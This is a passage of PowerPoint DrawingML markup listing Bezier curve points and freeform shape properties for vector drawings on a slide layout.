                    <a:pt x="148" y="199"/>
                    <a:pt x="141" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="207"/>
                    <a:pt x="137" y="208"/>
                    <a:pt x="134" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="209"/>
                    <a:pt x="128" y="208"/>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1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="200"/>
                    <a:pt x="18" y="198"/>
                    <a:pt x="11" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="196"/>
                    <a:pt x="7" y="196"/>
                    <a:pt x="5" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="193"/>
                    <a:pt x="0" y="191"/>
                    <a:pt x="1" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="186"/>
                    <a:pt x="2" y="185"/>
                    <a:pt x="2" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="180"/>
                    <a:pt x="4" y="176"/>
                    <a:pt x="3" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="170"/>
                    <a:pt x="2" y="168"/>
                    <a:pt x="2" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="162"/>
                    <a:pt x="3" y="160"/>
                    <a:pt x="7" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="159"/>
                    <a:pt x="12" y="159"/>
                    <a:pt x="14" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="158"/>
                    <a:pt x="22" y="154"/>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3"/>
                    <a:pt x="4" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="169"/>
                    <a:pt x="6" y="170"/>
                    <a:pt x="6" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="176"/>
                    <a:pt x="8" y="179"/>
                    <a:pt x="6" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="184"/>
                    <a:pt x="5" y="186"/>
                    <a:pt x="4" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="190"/>
                    <a:pt x="4" y="191"/>
                    <a:pt x="7" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="193"/>
                    <a:pt x="11" y="193"/>
                    <a:pt x="13" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="196"/>
                    <a:pt x="35" y="199"/>
                    <a:pt x="45" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="203"/>
                    <a:pt x="52" y="204"/>
                    <a:pt x="55" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="202"/>
                    <a:pt x="66" y="197"/>
                    <a:pt x="65" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="185"/>
                    <a:pt x="62" y="182"/>
                    <a:pt x="60" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="169"/>
                    <a:pt x="49" y="160"/>
                    <a:pt x="42" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="149"/>
                    <a:pt x="37" y="147"/>
                    <a:pt x="35" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="143"/>
                    <a:pt x="29" y="142"/>
                    <a:pt x="27" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="145"/>
                    <a:pt x="25" y="144"/>
                    <a:pt x="25" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="140"/>
                    <a:pt x="24" y="136"/>
                    <a:pt x="25" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="132"/>
                    <a:pt x="26" y="131"/>
                    <a:pt x="27" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="124"/>
                    <a:pt x="32" y="118"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="106"/>
                    <a:pt x="39" y="99"/>
                    <a:pt x="43" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="90"/>
                    <a:pt x="49" y="86"/>
                    <a:pt x="52" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="80"/>
                    <a:pt x="56" y="76"/>
                    <a:pt x="58" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="70"/>
                    <a:pt x="60" y="67"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="57"/>
                    <a:pt x="59" y="51"/>
                    <a:pt x="59" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="38"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="16"/>
                    <a:pt x="63" y="8"/>
                    <a:pt x="73" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="0"/>
                    <a:pt x="97" y="1"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="6"/>
                    <a:pt x="114" y="11"/>
                    <a:pt x="117" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="23"/>
                    <a:pt x="122" y="29"/>
                    <a:pt x="122" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="39"/>
                    <a:pt x="122" y="43"/>
                    <a:pt x="123" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="61"/>
                    <a:pt x="128" y="74"/>
                    <a:pt x="138" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="97"/>
                    <a:pt x="156" y="112"/>
                    <a:pt x="159" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="133"/>
                    <a:pt x="161" y="138"/>
                    <a:pt x="160" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="144"/>
                    <a:pt x="159" y="145"/>
                    <a:pt x="159" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="147"/>
                    <a:pt x="158" y="147"/>
                    <a:pt x="157" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="148"/>
                    <a:pt x="154" y="150"/>
                    <a:pt x="153" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="154"/>
                    <a:pt x="149" y="156"/>
                    <a:pt x="147" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="160"/>
                    <a:pt x="139" y="160"/>
                    <a:pt x="135" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="158"/>
                    <a:pt x="132" y="157"/>
                    <a:pt x="131" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="153"/>
                    <a:pt x="129" y="152"/>
                    <a:pt x="128" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="149"/>
                    <a:pt x="126" y="147"/>
                    <a:pt x="125" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="148"/>
                    <a:pt x="122" y="149"/>
                    <a:pt x="121" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="155"/>
                    <a:pt x="120" y="159"/>
                    <a:pt x="121" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="170"/>
                    <a:pt x="123" y="178"/>
                    <a:pt x="122" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="188"/>
                    <a:pt x="121" y="191"/>
                    <a:pt x="122" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="201"/>
                    <a:pt x="129" y="204"/>
                    <a:pt x="136" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="201"/>
                    <a:pt x="142" y="199"/>
                    <a:pt x="144" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="191"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="165" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="185"/>
                    <a:pt x="170" y="183"/>
                    <a:pt x="173" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="182"/>
                    <a:pt x="174" y="181"/>
                    <a:pt x="175" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="179"/>
                    <a:pt x="176" y="178"/>
                    <a:pt x="175" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="175"/>
                    <a:pt x="172" y="174"/>
                    <a:pt x="171" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="173"/>
                    <a:pt x="169" y="172"/>
                    <a:pt x="168" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="171"/>
                    <a:pt x="161" y="167"/>
                    <a:pt x="160" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="160"/>
                    <a:pt x="160" y="157"/>
                    <a:pt x="160" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="154"/>
                    <a:pt x="160" y="153"/>
                    <a:pt x="161" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="71"/>
                    <a:pt x="74" y="73"/>
                    <a:pt x="77" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="74"/>
                    <a:pt x="85" y="73"/>
                    <a:pt x="88" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="70"/>
                    <a:pt x="94" y="68"/>
                    <a:pt x="98" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="66"/>
                    <a:pt x="100" y="65"/>
                    <a:pt x="101" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="65"/>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="67"/>
                    <a:pt x="102" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="68"/>
                    <a:pt x="100" y="69"/>
                    <a:pt x="99" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="71"/>
                    <a:pt x="91" y="74"/>
                    <a:pt x="87" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="78"/>
                    <a:pt x="83" y="79"/>
                    <a:pt x="81" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="82"/>
                    <a:pt x="76" y="81"/>
                    <a:pt x="73" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="76"/>
                    <a:pt x="69" y="74"/>
                    <a:pt x="67" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="70"/>
                    <a:pt x="66" y="70"/>
                    <a:pt x="65" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="72"/>
                    <a:pt x="64" y="74"/>
                    <a:pt x="63" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="79"/>
                    <a:pt x="61" y="81"/>
                    <a:pt x="60" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="86"/>
                    <a:pt x="57" y="88"/>
                    <a:pt x="57" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="94"/>
                    <a:pt x="58" y="96"/>
                    <a:pt x="58" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="98"/>
                    <a:pt x="57" y="99"/>
                    <a:pt x="56" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="104"/>
                    <a:pt x="52" y="108"/>
                    <a:pt x="50" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="117"/>
                    <a:pt x="46" y="122"/>
                    <a:pt x="46" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="130"/>
                    <a:pt x="46" y="133"/>
                    <a:pt x="46" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="137"/>
                    <a:pt x="45"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1"/>
                    <a:pt x="38" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="121"/>
                    <a:pt x="37" y="122"/>
                    <a:pt x="37" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="127"/>
                    <a:pt x="35" y="131"/>
                    <a:pt x="36"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4"/>
                    <a:pt x="67" y="176"/>
                    <a:pt x="64" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="177"/>
                    <a:pt x="63" y="177"/>
                    <a:pt x="62" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="179"/>
                    <a:pt x="65" y="181"/>
                    <a:pt x="66" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="185"/>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2"/>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3" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="173"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="115" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="172"/>
                    <a:pt x="116" y="173"/>
                    <a:pt x="117" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="178"/>
                    <a:pt x="117" y="182"/>
                    <a:pt x="115" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="188"/>
                    <a:pt x="114" y="190"/>
                    <a:pt x="114" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="194"/>
                    <a:pt x="114" y="195"/>
                    <a:pt x="116" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="191"/>
                    <a:pt x="118" y="186"/>
                    <a:pt x="119" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="178"/>
                    <a:pt x="120" y="174"/>
                    <a:pt x="119" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="167"/>
                    <a:pt x="118" y="163"/>
                    <a:pt x="118" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="156"/>
                    <a:pt x="118" y="153"/>
                    <a:pt x="119" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="147"/>
                    <a:pt x="122" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="142"/>
                    <a:pt x="129" y="140"/>
                    <a:pt x="132" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="137"/>
                    <a:pt x="141" y="138"/>
                    <a:pt x="146" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="138"/>
                    <a:pt x="142" y="137"/>
                    <a:pt x="140" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="119"/>
                    <a:pt x="135" y="97"/>
                    <a:pt x="126" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="97"/>
                    <a:pt x="134" y="103"/>
                    <a:pt x="136" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="116"/>
                    <a:pt x="140" y="123"/>
                    <a:pt x="139" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="135"/>
                    <a:pt x="136" y="137"/>
                    <a:pt x="132" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="138"/>
                    <a:pt x="128" y="137"/>
                    <a:pt x="128" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="132"/>
                    <a:pt x="127" y="130"/>
                    <a:pt x="127" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="121"/>
                    <a:pt x="126" y="114"/>
                    <a:pt x="124" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="102"/>
                    <a:pt x="121" y="98"/>
                    <a:pt x="117" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="86"/>
                    <a:pt x="112" y="79"/>
                    <a:pt x="107" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="70"/>
                    <a:pt x="105" y="67"/>
                    <a:pt x="106" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="62"/>
                    <a:pt x="106" y="60"/>
                    <a:pt x="107" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="55"/>
                    <a:pt x="106" y="54"/>
                    <a:pt x="104" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="52"/>
                    <a:pt x="97" y="50"/>
                    <a:pt x="94" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="48"/>
                    <a:pt x="91" y="46"/>
                    <a:pt x="91" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="43"/>
                    <a:pt x="91" y="41"/>
                    <a:pt x="92" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="37"/>
                    <a:pt x="95" y="36"/>
                    <a:pt x="98" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="37"/>
                    <a:pt x="101" y="38"/>
                    <a:pt x="102" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="42"/>
                    <a:pt x="103" y="45"/>
                    <a:pt x="102" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="48"/>
                    <a:pt x="101" y="49"/>
                    <a:pt x="102" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="51"/>
                    <a:pt x="107" y="50"/>
                    <a:pt x="107" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="43"/>
                    <a:pt x="107" y="39"/>
                    <a:pt x="105" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="31"/>
                    <a:pt x="100" y="29"/>
                    <a:pt x="96" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="30"/>
                    <a:pt x="88" y="33"/>
                    <a:pt x="87" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="39"/>
                    <a:pt x="87" y="40"/>
                    <a:pt x="87" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="43"/>
                    <a:pt x="87" y="45"/>
                    <a:pt x="87" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="45"/>
                    <a:pt x="83" y="45"/>
                    <a:pt x="81" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="46"/>
                    <a:pt x="78" y="45"/>
                    <a:pt x="78" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="41"/>
                    <a:pt x="77" y="38"/>
                    <a:pt x="76" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="35"/>
                    <a:pt x="76" y="34"/>
                    <a:pt x="76" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="32"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="70" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="31"/>
                    <a:pt x="67" y="32"/>
                    <a:pt x="66" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="39"/>
                    <a:pt x="63" y="44"/>
                    <a:pt x="66" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="50"/>
                    <a:pt x="67" y="51"/>
                    <a:pt x="68" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="51"/>
                    <a:pt x="69" y="50"/>
                    <a:pt x="69" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="48"/>
                    <a:pt x="68" y="48"/>
                    <a:pt x="67" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="45"/>
                    <a:pt x="65" y="42"/>
                    <a:pt x="66" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="37"/>
                    <a:pt x="71" y="36"/>
                    <a:pt x="73" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="39"/>
                    <a:pt x="75" y="42"/>
                    <a:pt x="75" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="46"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="48"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="72" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="51"/>
                    <a:pt x="69" y="52"/>
                    <a:pt x="66" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="54"/>
                    <a:pt x="65" y="55"/>
                    <a:pt x="64" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="57"/>
                    <a:pt x="64" y="58"/>
                    <a:pt x="65" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="60"/>
                    <a:pt x="67" y="61"/>
                    <a:pt x="68" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="66"/>
                    <a:pt x="74" y="66"/>
                    <a:pt x="78" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="66"/>
                    <a:pt x="87" y="64"/>
                    <a:pt x="91" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="62"/>
                    <a:pt x="98" y="61"/>
                    <a:pt x="101" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="58"/>
                    <a:pt x="102" y="57"/>
                    <a:pt x="103" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="58"/>
                    <a:pt x="103" y="59"/>
                    <a:pt x="103" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="60"/>
                    <a:pt x="102" y="61"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="63"/>
                    <a:pt x="91" y="65"/>
                    <a:pt x="86" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="69"/>
                    <a:pt x="78" y="69"/>
                    <a:pt x="74" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="68"/>
                    <a:pt x="72" y="68"/>
                    <a:pt x="71" y="68"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="43"/>
                    <a:pt x="73" y="41"/>
                    <a:pt x="72" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="39"/>
                    <a:pt x="71" y="39"/>
                    <a:pt x="70" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="41"/>
                    <a:pt x="71" y="42"/>
                    <a:pt x="71" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="44"/>
                    <a:pt x="72" y="45"/>
                    <a:pt x="73" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="40"/>
                    <a:pt x="99" y="41"/>
                    <a:pt x="100" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="43"/>
                    <a:pt x="101" y="43"/>
                    <a:pt x="101" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="100" y="40"/>
                    <a:pt x="99" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98"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446"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5762" y="1153"/>
              <a:ext cx="3" cy="4"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 2"/>
                <a:gd name="T1" fmla="*/ 1 h 3"/>
                <a:gd name="T2" fmla="*/ 1 w 2"/>
                <a:gd name="T3" fmla="*/ 2 h 3"/>
                <a:gd name="T4" fmla="*/ 0 w 2"/>
                <a:gd name="T5" fmla="*/ 3 h 3"/>
                <a:gd name="T6" fmla="*/ 0 w 2"/>
                <a:gd name="T7" fmla="*/ 1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1"/>
                    <a:pt x="2" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>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Freeform 447"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
